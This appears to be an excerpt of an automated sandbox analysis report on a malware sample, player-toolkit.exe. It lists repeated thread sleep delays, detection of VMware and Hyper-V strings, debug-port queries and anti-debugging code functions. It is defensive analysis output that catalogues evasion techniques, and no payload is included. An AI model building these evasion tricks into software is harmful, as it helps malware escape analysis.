Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53897	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53788	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53679	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53569	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53459	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53350	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53241	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53131	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53022	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52912	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52804	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52693	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52584	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52475	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52366	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52257	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52147	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52038	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51929	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51819	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51710	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51600	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51491	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51382	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51272	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51163	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51054	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50944	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50835	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50725	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50616	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50506	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50397	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50288	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50178	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50069	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49960	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49850	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49740	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49631	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49522	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49413	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49303	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49194	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49085	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48975	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48866	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48757	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48647	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48538	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48429	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48319	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48208	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47991	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47881	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47772	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47663	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47553	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47444	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47335	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47224	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47116	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47006	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46897	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46788	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46678	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46569	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46460	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46350	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46241	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46132	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46022	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45913	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45804	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45694	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45585	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45474	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45366	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45256	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45147	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45038	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44928	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44819	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44710	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44600	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44491	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44382	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44272	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44163	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44053	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43943	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43835	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43725	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43616	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43507	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43397	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43288	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43179	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43069	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42960	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42851	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42741	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42632	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42522	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42413	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42303	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42194	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42085	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41975	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41866	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41757	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41647	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41538	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41279	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41178	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41069	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40960	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40850	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40741	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40632	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40248	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40101	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39991	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39854	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39716	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39068	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38958	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38851	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38741	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38632	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38522	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38412	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38303	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38194	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38084	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37975	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37866	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37756	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37647	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37538	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37428	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37319	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37210	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36991	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36882	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36772	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36663	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36554	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59886	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59776	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59666	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59558	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59448	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59339	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59229	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59120	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58900	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58792	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58683	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58573	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58464	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58353	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58245	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58136	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58026	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57917	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57807	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57698	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57588	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57479	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57370	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57261	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57151	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57042	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56933	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56823	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56713	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56604	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56495	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56386	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56276	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56167	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56057	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55948	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55839	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55729	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55620	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55511	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55401	Jump to behavior

Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000013.00000000.340891539.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.335555394.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000013.00000000.341444076.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000013.00000002.474023233.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 2_2_00019A80 rdtsc

2_2_00019A80

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 2_2_02999A00 NtProtectVirtualMemory,LdrInitializeThunk,

2_2_02999A00

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_000E6217 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

29_2_000E6217

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_0001C8D0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,

29_2_0001C8D0

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298D294 mov eax, dword ptr fs:[00000030h]	2_2_0298D294
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298D294 mov eax, dword ptr fs:[00000030h]	2_2_0298D294
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0296AAB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0296AAB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0298FAB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]	2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]	2_2_029552A5
